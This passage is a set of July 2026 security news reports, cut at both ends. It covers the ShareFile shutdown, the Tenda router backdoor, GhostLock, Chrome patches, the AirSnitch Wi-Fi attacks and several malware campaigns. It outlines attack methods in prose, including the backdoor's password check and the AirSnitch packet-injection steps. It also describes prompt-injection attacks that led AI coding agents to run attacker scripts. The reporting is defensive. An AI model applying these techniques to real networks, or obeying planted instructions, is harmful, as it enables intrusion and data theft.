claude-pro[.]com, license[.]claude-pro[.]com, sylverixstrategy[.]com, gouvvbo[.]top, vertextrust-advisors[.]com, and three security-vendor lookalikes sharing one IP, update-trellix[.]com, update-crowdstrike[.]com and update-sentinelone[.]com. The staging server was 43.106.71[.]28 on port 8000. Both lists come from Group-IB's July 23 report. Group-IB puts internet-facing Java applications first, then any public-facing system carrying an unpatched 9.8-rated flaw, these four included. For all the loader engineering, the scanning half of this operation ran on flaws disclosed in 2018 and 2021. The custom work all sits downstream of the break-in.
thehackernews.comJul 23, 2026extracted
⚡ Weekly Recap: ShareFile Threat, Citrix Bleed 2 Ransomware, AI Coding Attacks, and More
Somewhere right now, a security tool is quietly finding bugs faster than any human can fix them. That's supposed to be the good news. The catch is that the attackers have the same tools, pointed the other way, and they don't file tickets. That's the shape of this week. Trusted code turns on the people who installed it. Old bugs from last year are still landing because the fix sat in a queue too long. Fake installers, poisoned packages, systems left facing the open internet, and helpful little AI assistants running instructions that were never yours. The gap between "patch exists" and "already exploited" keeps shrinking, and nobody's closing it. None of it is exotic. That's what wears you down. Same ordinary mistakes, just happening faster than we can keep up. Here's the full mess, top to bottom. ⚡ Threat of the Week Progress Tells ShareFile Customers to Shut Down Storage Zone Controllers — Progress urged customers to shut down Windows servers running Storage Zone Controllers, citing a credible external security threat. The company has temporarily disabled access to the affected accounts, a step it says it took "out of an abundance of caution" while it works with internal and external security experts. The exact nature of the threat is unknown. There are no indications of unauthorized access to any ShareFile accounts or data. Where AI Security Is Actually Hiring in 2026 The AI security job market is no longer theoretical. SANS tracked hiring across 10 specific roles and mapped verified job data, salary ranges, and the skills required to get there. The three-tier framework gives your team a clear view of which roles to prioritize now and which to develop toward. Get the Free Guide ➝ 🔔 Top News Critical Zimbra Flaw Patched — Zimbra is urging customers to apply updates to address a critical security vulnerability impacting the Classic Web Client that could result in arbitrary code execution. The vulnerability has been described as a case of stored cross-site scripting (XSS) that could allow specially crafted emails to execute malicious scripts in a user's session. It has yet to be assigned a CVE identifier. "The update fixes a security issue in the Classic Web Client where a specially crafted email could run malicious code when the email is opened," Zimbra said. "If exploited, it could allow access to mailbox information, session data, or account settings." Jscrambler npm Package Compromised — The Jscrambler npm package was compromised to publish multiple versions containing a Rust-based information stealer designed to steal developer secrets from Windows, macOS, and Linux machines. According to Jscrambler, the attack was pulled off using a compromised npm publishing credential. The activity overlaps with IronWorm, which was first documented by JFrog last month. "The malware has shed its Linux-only skin, deploying a three-platform CSI container to target macOS and Windows, expanding its persistence, and automating its own propagation via direct registry PUT operations," the company said. New GigaWiper Backdoor Detailed — Microsoft shed light on a new post-compromise backdoor called GigaWiper that comes with three distinct destructive ways to render a machine inoperable: wipe the whole disk, overwrite the Windows drive, or run fake "ransomware" that encrypts files with a key it never saves. In addition, it can take screenshots, record the screen, and launch a hidden VNC session. The malware artifacts are similar to another backdoor codenamed BLUERABBIT, which is assessed to be the work of an Iran-nexus threat actor. SHELLSTORM, a Modern Web Shell Access Brokerage Operation — More than 1.4 million domains have been targeted as part of a large-scale operation that exploited 27 CVEs in WordPress plugins to deploy web shells on compromised servers. The largest number of infections have been reported in Taiwan, the U.S., Germany, France, and the U.K. The access provided by the web shell is then used to deliver the SNOWLIGHT dropper and the VShell backdoor. The activity has been codenamed SHELLSTORM. The activity is assessed to be the work of a Chinese or Chinese-speaking threat actor. HalluSquatting Can Trick AI Coding Assistants Into Installing Botnets — While artificial intelligence (AI) tools are prone to hallucinations, new research has detailed a new iteration of slopsquatting and phantom squatting called HalluSquatting. The technique essentially involves registering legitimate-sounding resource names invented by an AI agent, registering them first, and then waiting for the assistant to run the malicious code embedded in the code. The attack pairs hallucinations with prompt injections to trick the agent into executing attacker-controlled instructions. ️🔥 Trending CVEs Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild. Check the list, patch what you have, and hit the ones marked urgent first — From BRLY-2026-037 through BRLY-2026-042 (U-Boot), CVE-2026-50746, CVE-2026-50747, CVE-2026-50748, CVE-2026-54400, CVE-2026-55115, CVE-2026-54402, CVE-2026-55116 (Ubiquiti Unifi), CVE-2026-40138, CVE-2026-40139, CVE-2026-40140, CVE-2026-40141 (BeyondTrust Remote Support and Privileged Remote Access), CVE-2026-11405 (Tenda), CVE-2026-43499 aka GhostLock, CVE-2026-46215 (Linux Kernel), CVE-2026-53359 aka Januscape (KVM/x86), CVE-2026-52830 (fast-mcp-telegram), CVE-2026-57992 (Microsoft Edge), CVE-2026-11712, CVE-2026-11708, CVE-2026-11595 (IBM WebSphere Application Server), CVE-2026-12184, CVE-2026-14355 (PHP), CVE-2026-52761, CVE-2026-52747 (OWASP ModSecurity), CVE-2026-14898 (OpenAI Codex for macOS), CVE-2026-13753 (HP Deskjet 2800 Printer Series), CVE-2026-10706, CVE-2026-10708 (Adalo Database API), CVE-2026-15112, CVE-2026-15129 (Google Chrome), CVE-2026-12116, CVE-2026-14261 (Xerte Online Toolkit), CVE-2026-13461, CVE-2026-13462 (PayRange Android app), CVE-2026-0288 (Palo Alto Networks PAN-OS), CVE-2026-47291 (Microsoft Windows HTTP.sys), CVE-2026-15146 (GNU Wget), CVE-2026-31694 (Linux FUSE), CVE-2026-54432 (Roundcube webmail), CVE-2026-14544 (HP Linux Imaging and Printing), CVE-2026-13126, CVE-2026-57260, CVE-2026-57248, CVE-2026-57246 (Foxit PDF Reader and PDF Editor), CVE-2026-6896, CVE-2026-13320 (GitLab CE and EE), CVE-2025-14179 (pdo_firebird), and CVE-2025-14180 (PDO PostgreSQL) 🎥 Cybersecurity Webinars Learn to Kill a Rogue AI Agent Before It Leaks Your Secrets → Guardrails alone won't save you. Okta Threat Intelligence Director Jeremy Kirk went hands-on with OpenClaw and watched agentic AI leak credentials, bypass safety controls, and turn into a live attack surface. In this webinar, he turns that into steps you can apply today: treat agents as first-class identities, enforce least-privilege access, use short-lived secrets, and hit the kill switch on shadow AI. Real attacks, real fixes. Save your seat. Your Team Ships 50x More Code. Humans Can't Review It Anymore → Frontier models like Mythos are compressing dev timelines past the point humans can review what humans build. Chainguard Field CISO John Sapp shows why that's an architectural problem, not a velocity one: your attack surface is expanding in real time, adversaries have the same models, and CVE-based remediation breaks down at machine speed. Leave with a secure-by-default strategy and the language to take it to your board. Save your seat. 📰 Around the Cyber World Compromising AI Gateways for Cryptomining — Threat actors have been observed compromising AI gateways such as LiteLLM Proxy connected to Amazon Bedrock services to deploy payloads that communicate with cryptomining infrastructure for unauthorized compute activity. Initial access to the LiteLLM Proxy EC2 instance is said to have been facilitated via internet-exposed SSH. "While the ultimate impact in this case appeared to be unauthorized cryptomining, the incident is notable because of where it occurred," Darktrace said. "The compromised asset sat at the intersection of cloud infrastructure, identity, and AI services. The incident demonstrates why organizations should treat AI infrastructure as part of their critical attack surface rather than as a standalone application tier." Exploitation of CVE-2026-1207 Reported — Threat actors are actively exploiting a security flaw in Django (CVE-2026-1207), an SQL injection flaw that could result in remote code execution. "Observed exploitation volumes remain steady week-over-week, indicating sustained interest from threat actors," CrowdSec said. "Most observed attacks involve focused reconnaissance to identify vulnerable Django and PostGIS configurations, suggesting sophisticated targeting rather than broad spraying." Multi-Stage Infection Leads to Node.js Backdoor — A malicious ZIP file containing a Windows shortcut (LNK) is being used to execute a hidden PowerShell command that downloads a legitimate node.exe binary and deploys a NodeJS-based backdoor. "The malware also uses the EtherHiding technique, leveraging the TON blockchain to retrieve its command-and-control (C2) address," LevelBlue said. "The campaign begins with a spam email targeting the hospitality sector using booking-themed lures. The email contains a link hosted on Google Share, which is abused by the threat actor to make it look legit and also evade email security filtering." Intrusions Exploit Citrix Bleed 2 — Threat actors are exploiting Citrix Bleed 2 (CVE-2025-5777) to deploy the DragonForce ransomware. "After gaining access, the attacker followed a consistent post-compromise pattern: escalate to SYSTEM through a registry-symlink/AppMgmt privilege-escalation trick, create rogue local admin accounts, and establish persistence with legitimate remote access tools like ScreenConnect and Zoho Assist," Huntress said. "In the most advanced case, the operation ended with DragonForce ransomware deployment, which is why the blog's main takeaway is urgent action: patch exposed NetScaler appliances, retain and review logs, terminate outstanding sessions, and audit for suspicious accounts and remote-management tooling." The cybersecurity company said it observed half a dozen intrusions across unrelated organizations in the first half of 2026 using the same repeatable seven-step attack chain, indicating a highly standardized operator playbook rather than one-off compromises. Fake Chinese VPN Drops GoodPersonRAT — An MSI file masquerading as an installer for Kuailian VPN (aka LetsVPN) has been observed dropping and executing an encrypted RAT called GoodPersonRAT that provides attackers with complete control over a victim’s machine and its data. "Several features are implemented, such as full remote control, keylogging, browser manipulation, persistence, and auto-updating," ThreatLocker said. Fake Braintree NuGet Package Delivers Skimmer — A malicious .NET package named Braintree.Net has been found to impersonate Braintree's legitimate Braintree SDK while deploying a multi-stage .NET implant that intercepts live payment card data, exfiltrates Braintree merchant API keys, and harvests host environment secrets upon assembly load. It also facilitates token theft, avoids sandboxes, and implements production-only gating. "This split behavior allows the attacker to deliberately target payment data in production, while environment reconnaissance casts a wider net," Socket said. RedHook Android Malware Uses Wireless ADB for Shell Access — A resurfaced version of the RedHook Android trojan has incorporated new, sophisticated, and malicious functionalities, including autonomous privilege abuse, expanded command-and-control capabilities, and a robust persistence stack. "While retaining core RAT functionalities, such as screen streaming and keylogging, the latest iterations demonstrate a sophisticated shift toward privilege abuse," Group-IB said. "RedHook abuses Android's ADB Wireless Debugging features to autonomously obtain shell-level access." Recent activity indicates an expansion of targeting beyond Vietnam to include users in Indonesia, suggesting a broader regional focus across Southeast Asia. The malware is distributed via spoofed government and financial websites, but the malicious APK payloads are hosted on reputable cloud and development platforms, including AWS S3 Buckets and GitHub repositories, likely in an attempt to enhance delivery reliability. Phishing Campaign Targets Russian Aerospace Organizations — A spear-phishing campaign disguised as a legitimate business invoice targets aerospace organizations in Russia. "The phishing email impersonates a legitimate Russian research institute associated with aerospace and aviation systems and is delivered using a spoofed domain designed to mimic the organization," Seqrite Labs said. "The malicious email contains a password-protected attachment that ultimately deploys additional payloads on the victim’s system. Analysis indicates that the threat actor’s primary objective is to establish persistent remote access by silently configuring AnyDesk for unattended access, exfiltrating AnyDesk configuration data to an attacker-controlled email account, and implementing persistence mechanisms to retain long-term control of the compromised host." The activity overlaps with previously documented campaigns attributed to Rare Werewolf (aka Librarian Ghouls), which is known to target organizations in Russia, Belarus, and Kazakhstan. Helix Data Extortion Crew Emerges — A new data extortion group called Helix is employing voice phishing (vishing), device code phishing, and multi-factor authentication (MFA) abuse to steal data from SharePoint environments. Helix is said to have emerged from the BlackFile (aka UNC6671) and ShinyHunters (aka UNC6661) ecosystem. BlackFile has also splintered into Pink and Redact following its shutdown in April 2026. "In the kill chain, a single compromised identity served as the throughline from initial access to exfiltration. However, we have also observed what appears to be a tactical split," ReliaQuest said. "A first user is compromised through vishing and used for data exfiltration, quietly enumerating and bulk-downloading SharePoint libraries over a period of days. A second user is then compromised separately, often days or even weeks later, and appears to be used solely to deliver the extortion message internally via Microsoft Teams and email. The second account carries no exfiltration activity. It appears to exist in the operation for one purpose, which is to post the extortion demand inside the target's own collaboration environment." Microsoft Warns of Increase in Number of Windows Security Updates — Microsoft has warned customers to expect a spike in the number of security updates for Windows, as it uses AI techniques like MDASH to find more zero-day vulnerabilities. "The pace of vulnerability discovery is changing with advances in AI making it possible to find more issues, faster, across more code, with new mechanisms that can accelerate both discovery and analysis," the company said. "The fastest way to reduce customer exposure is to find issues before attackers can use them. Windows is expanding its ability across the platform to find issues earlier, accelerate the engineering work to fix them, strengthen validation, and deliver timely, high-quality updates that keep customers protected." 🔧 Cybersecurity Tools Caeruleus → Praetorian has released Caeruleus, a free open-source toolkit that folds the whole Bluetooth Low Energy testing workflow into one Go binary. Running on Linux/BlueZ, it lets testers scan devices, read or write the GATT tree, capture notifications, fuzz characteristics, and run security checks, replacing the usual hcitool, gatttool, and bettercap mix. Every command can output JSON for scripting and AI agents. PhantomFS → It is a free open-source Windows honeypot that uses the Projected File System (ProjFS) to project convincing decoy files, credentials, financials, and SSH keys, into a virtual directory that lives only in memory and never hits disk. The moment an attacker or insider opens one, it writes a Windows Event Log entry and fires a desktop Toast alert with the filename, timestamp, and process context, giving high-confidence detection with no tuning, ML, or cloud. Disclaimer: This is strictly for research and learning. It hasn't been through a formal security audit, so don't just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you’re doing stays on the right side of the law. Conclusion The lesson this week is simple. Every shortcut we took to move faster is now a door someone else can walk through. The package you trusted. The remote tool is left running. The AI that does whatever it reads. We built the shortcuts. Someone else is using them. So patch the urgent stuff first, close the sessions you forgot were open, and go check what's still facing the internet that shouldn't be. None of it is exciting. It's just the part nobody goes back to until it's too late. See you next week, if nothing breaks before then. (This article has been corrected to accurately attribute the discovery of the GoodPersonRAT campaign. An earlier version incorrectly credited ThreatDown. The correct attribution is ThreatLocker. The error is regretted.)
thehackernews.comJul 13, 2026extracted
13th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th July, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES U.S. auto insurer AssuranceAmerica has disclosed a data breach affecting approximately 7 million people. Attackers targeted an employee and used compromised credentials to access company systems, stealing names, contact information, driver’s license numbers, insurance policy and account data, vehicle information, and claims details. Latvia’s state-owned forestry company Latvijas Valsts Meži has suffered a ransomware attack that disrupted mapping, hunting, contractor, and customer systems. Attackers exploited a system that had remained unpatched for two years and leaked approximately 44GB of internal documents, credentials, cryptographic keys, source code, and email correspondence. Injective Labs, a developer of blockchain and cryptocurrency software, has experienced a supply chain compromise after attackers accessed its SDK project and published malicious npm packages. The affected releases exfiltrated cryptocurrency wallet private keys and seed phrases when developers used legitimate key-generation functions embedded in the compromised software. Moody Bible Institute, a U.S. faith-based educational institution, has disclosed a data breach affecting more than 2.3 million donors, students, alumni, and supporters. The ShinyHunters extortion group published allegedly stolen information, including names, dates of birth, residential addresses, email addresses, and phone numbers. AI THREATS Researchers profiled JadePuffer, an autonomous ransomware operation that used a large language model to conduct an intrusion without direct human control. The operation exploited CVE-2025-3248 in an exposed Langflow instance, accessed a production MySQL server, exfiltrated selected information, deleted the database, and issued an extortion demand. Researchers showed that malicious instructions hidden inside open-source project files could achieve remote code execution through Anthropic Claude Code and OpenAI Codex. When operating with automated permissions, the coding agents processed the instructions and executed attacker-controlled scripts, demonstrating a risk that may affect other autonomous development tools. Researchers disclosed Rogue Agent, a vulnerability in Google Dialogflow CX that allowed users with limited agent-editing permission to insert persistent malicious code. The injected code could capture and exfiltrate chatbot conversations. Google addressed the issue, and no known customer environments were compromised through the vulnerability. VULNERABILITIES AND PATCHES Multiple Tenda router models are affected by CVE-2026-11405, an undocumented authentication backdoor that provides administrative access through a hidden password. The flaw affects several FH1201, W15E, AC10, AC5, and AC6 firmware versions and allows attackers to bypass configured credentials and modify device and network settings. Linux maintainers have patched CVE-2026-53359, a critical vulnerability in the Kernel-based Virtual Machine hypervisor. A malicious guest virtual machine could corrupt host kernel memory and potentially escape into the host environment. The flaw affects Intel and AMD x86 systems and is particularly relevant to shared cloud infrastructure. U-Boot has addressed six vulnerabilities affecting signature verification of Flattened Image Tree files used during secure boot. Two flaws could enable arbitrary code execution while a device loads a supposedly verified image, and four could cause crashes. The affected bootloader is widely used in routers, cameras, and embedded controllers. Opera has addressed a critical vulnerability in the Opera GX browser that allowed malicious websites to install browser modifications without user confirmation. An attacker-controlled modification could inject styles across open tabs, leak information such as Gmail addresses, and crash the browser. Opera corrected the issue. THREAT INTELLIGENCE REPORTS Check Point Research has profiled Cavern Manticore, an Iran-linked threat actor targeting Israeli government and information technology organizations. The group uses a modular .NET command-and-control framework and has abused remote management software and a compromised software update mechanism to deploy file-management, database, scanning, and tunneling capabilities. Check Point Threat Emulation and Harmony Endpoint provide protection against this threat Check Point Research have analyzed global cyberattack activity during June 2026, recording an average of 2,270 weekly attacks per organization. Ransomware incidents increased by 33% from June 2025, while The Gentlemen overtook Qilin as the most active group during the month. Check Point researchers have investigated a student employment phishing campaign that abused compromised school email accounts and Google Forms. More than 3,200 messages passed email authentication checks and attempted to collect banking information, residential addresses, and other details associated with money mule recruitment and account compromise. Researchers analyzed UAT-7810, a China-linked threat actor that compromises internet-facing networking devices to expand operational relay box infrastructure. The group developed new malware components and exploited unpatched Ruckus and ASUS devices to create proxy nodes for associated threat actors.
research.checkpoint.comJul 13, 2026extracted
Progress Prompts ShareFile Storage Zone Controller Shutdown Amid Security Concerns
Enterprise software giant Progress Software on Friday prompted ShareFile customers to shut down Storage Zone Controller servers amid security concerns. A Storage Zone Controller provides ShareFile customers with private data storage, either on-premises or on a third-party storage system, that is protected with an application-specific password and is self-managed. On Friday, the company notified customers that it had disabled access to ShareFile accounts using the Storage Zone Controllers and that it is investigating a ‘credible external security threat’. “We are aware of a credible external security threat targeting Progress ShareFile Storage Zone Controllers,” a message on the company’s forums reads. Progress also told customers that, as an additional protection measure, they should manually shut down their Storage Zone Controllers. “Please manually shut down the server hosting your Storage Zone Controllers as soon as possible while Progress continues its assessment with cybersecurity experts,” the company’s message reads. “At this time, we do not indicate unauthorized access to any Progress ShareFile accounts or customer data,” the company said. Progress has not shared details about the security threat, but users speculate that threat actors might be targeting two vulnerabilities addressed in March. The flaws, tracked as CVE-2026-2699 (CVSS score of 9.8) and CVE-2026-2701 (CVSS score of 9.1), could be chained together to make configuration changes and upload malicious files to achieve remote code execution (RCE) without authentication. Responding to a SecurityWeek inquiry, Progress said it restored customer access to the ShareFile service over the weekend, cautioning that they should not turn Storage Zone Controllers back on: “As of 5 p.m. ET on Sunday, July 12, we notified all ShareFile customers with Storage Zone Controllers that their access to the Progress ShareFile cloud service has been restored. However, Storage Zone Controllers must remain turned off while we complete our investigation. At this time, we have no evidence of unauthorized access to any ShareFile customer account or data, and we have not identified any active threat. We will continue to provide customers with updates as additional information becomes available.” *Updated with statement from Progress Software. Related: Unpatched Backdoor in Tenda Firmware Grants Admin Access to Devices Related: CISA Urges Immediate Patching of Exploited ColdFusion, Langflow, Joomla Flaws Related: Critical Gitea Flaw Under Active Exploitation, Researchers Warn Related: Critical Adobe ColdFusion Vulnerability Exploited in Attacks
securityweek.comJul 13, 2026extracted
15-Year-Old Linux Vulnerability ‘GhostLock’ Earns Researchers $92k From Google
Nebula Security has published technical information and exploit code targeting a Linux kernel vulnerability that affects all major distributions since 2011. Tracked as CVE-2026-43499 and referred to as GhostLock, the security defect was introduced in Linux 2.6.39 and lurked in the kernel for 15 years until a patch was rolled out in April. GhostLock is a use-after-free issue introduced with a helper function designed to clean up after a task has been closed, as part of the kernel’s system of prioritizing urgent tasks. Normally, the cleanup function would clear the current task. Due to the security defect, when a deadlock is encountered and a rollback occurs, the function clears the memory and reuses it while a pointer to it exists in another task. The issue exists because the function assumes that the current task is the one that needs to be cleared up. However, when a requeue is requested, the function cleans up on behalf of a sleeping thread instead of the current one. Nebula Security says it was able to exploit the vulnerability to control the inadvertently freed memory and achieve local privilege escalation to root. It also demonstrated that the security defect could be exploited for a container escape in Google’s kernelCTF program and received a $92,337 bug bounty reward. GhostLock is the latest in a series of Linux kernel flaws that have been publicly disclosed over the past months. The list also includes Januscape, Bad Epoll, DirtyClone, CIFSwitch, DirtyDecrypt (aka DirtyCBC), Fragnesia, and Dirty Frag. Related: Microsoft Patches Defender ‘RoguePlanet’ Vulnerability Related: Chrome 150 Update Patches 27 Vulnerabilities Related: Unpatched Backdoor in Tenda Firmware Grants Admin Access to Devices Related: CISA Urges Immediate Patching of Exploited ColdFusion, Langflow, Joomla Flaws
securityweek.comJul 9, 2026extracted
Chrome 150 Update Patches 27 Vulnerabilities
Google on Wednesday announced a Chrome 150 security update that resolves 27 vulnerabilities, including two critical-severity flaws. The two critical bugs are use-after-free issues in Chrome’s Ozone and Views components. Both were found by Google last month. The Chrome refresh resolves a total of 13 use-after-free defects, including 10 high-severity and one medium-severity weakness. Other types of vulnerabilities patched in this update include uninitialized use, integer overflow, out-of-bounds read and write, insufficient validation of untrusted input, inappropriate implementation, insufficient data validation, and insufficient policy enforcement. Most of these flaws were discovered by Google, a trend that has been ongoing for over two months. Per Google’s advisory, only three of the newly resolved security defects were reported by external researchers, who received a total of $3,000 in bug bounty rewards. Likely driven by the use of AI, the trend led to lower bug bounty rewards but resulted in far more security weaknesses being addressed. Since April, Google has rolled out fixes for more than 1,400 Chrome vulnerabilities, including hundreds of memory safety bugs. Chrome updates released in June and July resolved over 1,000 flaws. The latest Chrome iteration is now available for download as versions 150.0.7871.114/.115 for Windows and macOS, and as version 150.0.7871.114 for Linux. Related: Google Patches 382 Chrome Vulnerabilities Related: Chrome 149 Update Resolves 18 Severe Vulnerabilities Related: Unpatched Backdoor in Tenda Firmware Grants Admin Access to Devices Related: CISA Urges Immediate Patching of Exploited ColdFusion, Langflow, Joomla Flaws
securityweek.comJul 9, 2026extracted
Unpatched Backdoor in Tenda Firmware Grants Admin Access to Devices
A security researcher has discovered an undocumented backdoor in multiple Tenda firmware versions that provides attackers with administrative access to a device’s web management interface. The security hole appears to affect Tenda routers, switches, and other types of networking devices. Tracked as CVE-2026-11405, the vulnerable code was found in the login function of the web server binary and can be abused for authentication bypass, warns the CERT Coordination Center (CERT/CC) at Carnegie Mellon University. The issue exists because, when authentication fails, the login mechanism attempts to retrieve a password value stored in the device’s configuration. Next, the mechanism checks only the user-supplied password against the value stored in the configuration, in plaintext, and grants administrative access upon a successful match. “The associated username is not validated, so any provided username will succeed when paired with the backdoor password. This backdoor authentication mechanism is not documented or visible through any administrative interface,” CERT/CC explains. Successful exploitation of the security defect provides an attacker with the ability to modify device configurations and network settings, and to disable security features, which could lead to local network compromise. CERT/CC says it was unable to coordinate with the vendor to disclose the security defect, and no patch has been released for it. Users are advised to disable the remote web management of their devices to prevent unauthorized external access and to change the default LAN IP address to reduce the risk of discovery by automated scanners. On Tuesday, CERT/CC also disclosed a missing authorization vulnerability in HP Deskjet 2800 series printers running firmware versions up to TBP1CN2612AR. The flaw has not been patched and is tracked as CVE-2026-13753. An attacker can send GET requests to multiple backend API endpoints that, without authentication or session state validation, return admin configuration data such as Wi-Fi Direct SSID, plaintext passphrase, unique printer serial numbers, service IDs, and administrative password state details. “This vulnerability allows unauthenticated access to the printer’s webserver API endpoints, exposing Wi-Fi credentials, management configuration details, and sensitive security data normally restricted to administrative users,” CERT/CC explains. Related: CISA Urges Immediate Patching of Exploited ColdFusion, Langflow, Joomla Flaws Related: Critical Vulnerability Exposes GitHub Agentic Workflows to Prompt Injection Related: Critical Gitea Flaw Under Active Exploitation, Researchers Warn Related: ‘DirtyClone’ Linux Kernel Vulnerability Leads to Root Access
securityweek.comJul 9, 2026extracted
Hidden backdoor in Tenda router firmware grants admin access
A hidden authentication backdoor has been found in multiple Tenda router firmware versions, potentially allowing an attacker to gain administrative access to the device's web management panel. According to a security bulletin from the CERT Coordination Center, the issue remains unfixed because the Chinese maker of the networking equipment couldn't be reached. CERT/CC says the issue, tracked as CVE-2026-11405, is caused by an undocumented authentication mechanism in the 'login()' function of the '/bin/httpd' web server binary. If a user attempts to log in, the router firmware will perform standard MD5-based authentication. If that fails, it will retrieve an alternate password from the 'sys.rzadmin.password' configuration value and compare it directly to the plaintext password supplied by the remote user. If the passwords match, the device grants administrator (role=2) access and creates a valid session, regardless of the username entered. So any username will be accepted by the mechanism as long as the backdoor password is supplied. CERT/CC says this mechanism isn't documented anywhere, or mentioned on the administrative interface, leaving users unaware of the risk. "Successful exploitation grants full administrative access to the device's web interface, regardless of the configured administrator account credentials," describes CERT/CC. "With administrative control, an attacker can reconfigure the device, alter network settings, and disable security features, enabling broader compromise of the local network." CVE-2026-11405 impacts the following Tenda firmware versions and devices: US_FH1201V1.0BR_V1.2.0.14(408)_EN_TD – Tenda FH1201 (WiFi router) US_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE – Tenda W15E (WiFi router) US_AC10V1.0re_V15.03.06.46_multi_TDE01 – Tenda AC10 (WiFi router) US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 – Tenda AC5 (WiFi router) US_AC6V2.0RTL_V15.03.06.51_multi_T – Tenda AC6 V2 (WiFi router) CERT/CC reports that no patch is currently available, and Tenda users are advised to disable the remote web management panel to prevent internet access to the vulnerable interface. Additionally, it is recommended to restrict local network exposure by changing the default LAN IP address to reduce opportunistic discovery by automated scanners. CVE-2026-11405 was discovered and reported to CERT/CC by an anonymous researcher. While no mention of active exploitation exists, the issue is very likely to be targeted by botnets focusing on router flaws in the coming period. BleepingComputer has contacted Tenda for comment, and we will add their response if we receive one. Update 09/07 - Researcher Will Dormann has stated on Mastodon that the backdoor password is not present in the firmware versions CERT/CC listed on its advisory, though it is present on others, not listed by CERT/CC. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comJul 7, 2026extracted
CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware
Several versions of firmware released by Chinese network device manufacturer Tenda have been found to embed an undocumented authentication backdoor that enables administrative access to the devices' web management interfaces, the CERT Coordination Center (CERT/CC) warned Monday. "An attacker can exploit this vulnerability, tracked as CVE-2026-11405, to bypass the password verification process and obtain full administrative control without valid credentials," the CERT/CC said in an alert. The vulnerability impacts multiple versions of the firmware - US_FH1201V1.0BR_V1.2.0.14(408)_EN_TD US_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2.0RTL_V15.03.06.51_multi_T The backdoor functionality is present within the "login()" function of the "/bin/httpd" web server binary. While the method initially follows a normal authentication path using MD5-based password verification, it activates an alternate code path if the authentication fails. Specifically, this involves calling "GetValue("sys.rzadmin.password")" to fetch an alternate password value from the device configuration, and performing a direct plaintext comparison between the user-supplied password and the configuration-stored value. Should these values match, the application grants admin-level access (role=2) and creates a valid session with elevated privileges. "The associated ["rzadmin"] username is not validated, so any provided username will succeed when paired with the backdoor password," the CERT/CC said. "This backdoor authentication mechanism is not documented or visible through any administrative interface." Successful exploitation of this standard username validation override allows full administrative access to the device's web interface regardless of the administrator account credentials. It can permit an attacker to make unauthorized remote modification of settings, disable security features, or reconfigure the device, potentially leading to a complete device takeover. The vulnerability, reported by an anonymous researcher, remains unpatched as of writing. The Hacker News has contacted Tenda for comment, and we will update the story if we hear back. In the interim, users are advised to disable remote management on the device and change the default LAN IP address to prevent bad actors from reaching it and reduce opportunistic discovery by automated scanners that target known default IP ranges.
thehackernews.comJul 7, 2026extracted
How to protect your organization from AirSnitch Wi-Fi vulnerabilities | Kaspersky official blog
At the NDSS Symposium 2026 in San Diego in February, a group of respected researchers presented a study unveiling the AirSnitch attack, which bypasses the Wi-Fi client isolation feature — also commonly known as guest network or device isolation. This attack allows connecting to a single wireless network via an access point, and then gaining access to other connected devices, including those using entirely different service set identifiers (SSIDs) on that same hardware. Targeted devices could easily be running on wireless subnets protected by WPA2 or WPA3 protocols. The attack doesn’t actually break encryption; instead, it exploits the way access points handle group keys and packet routing. In practical terms, this means that a guest network provides very little in the way of real security. If your guest and employee networks are running on the same physical device, AirSnitch allows a connected attacker to inject malicious traffic into neighboring SSIDs. In some cases, they can even pull off a full-blown man-in-the-middle (MitM) attack. Wi-Fi security and the role of isolation Wi-Fi security is constantly evolving; every time a practical attack is made against the latest generation of protection, the industry shifts toward more complex algorithms and procedures. This cycle started with the FMS attacks used to crack WEP encryption keys, and continues to this day: recent examples include the KRACK attacks on WPA2, and the FragAttacks, which impacted every security protocol version from WEP all the way through WPA3. Attacking modern Wi-Fi networks effectively (and quietly) is no small feat. Most professionals agree that using WPA2/WPA3 with complex keys and separating networks based on their purpose is usually enough for protection. However, only specialists really know that client isolation was never actually standardized within the IEEE 802.11 protocols. Different manufacturers implement isolation in completely different ways — using Layer 2 or Layer 3 of network architecture; in other words, handling it at either the router or the Wi-Fi controller level — meaning the behavior of isolated subnets varies wildly depending on your specific access point or router model. While marketing claims that client isolation is perfect for keeping restaurant or hotel guests from attacking one another — or ensuring corporate visitors can’t access anything but the internet — in reality, isolation often relies on people not trying to hack it. This is exactly what the AirSnitch research highlights. Types of AirSnitch attacks The name AirSnitch doesn’t just refer to a single vulnerability, but a whole family of architectural flaws found in Wi-Fi access points. It’s also the name of an open-source tool used to test routers for these specific weaknesses. However, security professionals need to keep in mind that there’s only a very thin line between testing and attacking. The model for all these attacks is the same: a malicious client is connected to an access point (AP) where isolation is active. Other users — the targets — are connected to the same SSID or even different SSIDs on that same AP. This is a very realistic scenario; for example, a guest network might be open and unencrypted, or an attacker could simply get the guest Wi-Fi password by posing as a legitimate visitor. For certain AirSnitch attacks, the attacker needs to know the victim’s MAC or IP address beforehand. Ultimately, how effective each attack is depends on the specific hardware manufacturer (more on that below). GTK attack After the WPA2/WPA3 handshake, the access point and the clients agree on a Group Transient Key (GTK) to handle broadcast traffic. In this scenario, the attacker wraps packets destined for a specific victim inside a broadcast traffic envelope. They then send these directly to the victim while spoofing the access point’s MAC address. This attack only allows for traffic injection, meaning the attacker won’t receive a response. However, even that is enough to deliver malicious ICMPv6 routing advertisements, or DNS and ARP messages to the client — effectively bypassing isolation. This is the most universal version of the attack working on any WPA2/WPA3 network that uses a shared GTK. That said, some enterprise-grade access points support GTK randomization for each individual client, which renders this specific method ineffective. Broadcast packet redirection This version of the attack doesn’t even require the attacker to authenticate at the access point first. The attacker sends packets to the AP with a broadcast destination address (FF:FF:FF:FF:FF:FF) and the ToDS flag set to 1. As a result, many access points treat this packet as legitimate broadcast traffic; they encrypt it using the GTK, and blast it out to every client on the subnet, including the victim. Just like in the previous method, traffic specifically meant for a single victim can be pre-packaged 